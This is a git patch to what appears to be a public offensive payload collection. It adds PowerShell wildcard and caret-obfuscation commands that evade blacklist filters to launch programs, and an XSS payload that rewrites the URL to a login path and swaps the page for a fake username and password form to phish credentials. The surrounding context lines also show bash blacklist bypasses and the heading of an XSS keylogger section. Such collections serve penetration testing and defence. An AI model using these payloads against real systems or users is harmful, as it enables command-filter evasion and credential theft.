From ea0bddc18a12d6ad46e763fbc52f93481b1a5620 Mon Sep 17 00:00:00 2001 From: Swissky <swisskysec@protonmail.com> Date: Tue, 8 Jan 2019 20:49:05 +0100 Subject: [PATCH] Windows RCE wildcard + XSS UI redressing --- Remote commands execution/README.md | 6 ++++++ XSS injection/README.md | 9 +++++++++ 2 files changed, 15 insertions(+) diff --git a/Remote commands execution/README.md b/Remote commands execution/README.md index 38d3589..828a481 100644 --- a/Remote commands execution/README.md +++ b/Remote commands execution/README.md @@ -110,6 +110,12 @@ cat ${test//hhh\/hm/} cat ${test//hh??hm/} ``` +Bypass blacklisted word with wildcards +```powershell +powershell C:\*\*2\n??e*d.*? # notepad +@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc +``` + Bypass zsh/bash/sh blacklist ```powershell diff --git a/XSS injection/README.md b/XSS injection/README.md index 781975e..9df2b3e 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md @@ -33,6 +33,15 @@ fclose($fp); ?> ``` +UI redressing (Sophisticated phishing) + +```html +<script> +history.replaceState(null, null, '../../../login'); +document.body.innerHTML = "</br></br></br></br></br><h1>Please login to continue</h1><form>Username: <input type='text'>Password: <input type='password'></form><input value='submit' type='submit'>" +</script> +``` + Keylogger for XSS ```javascript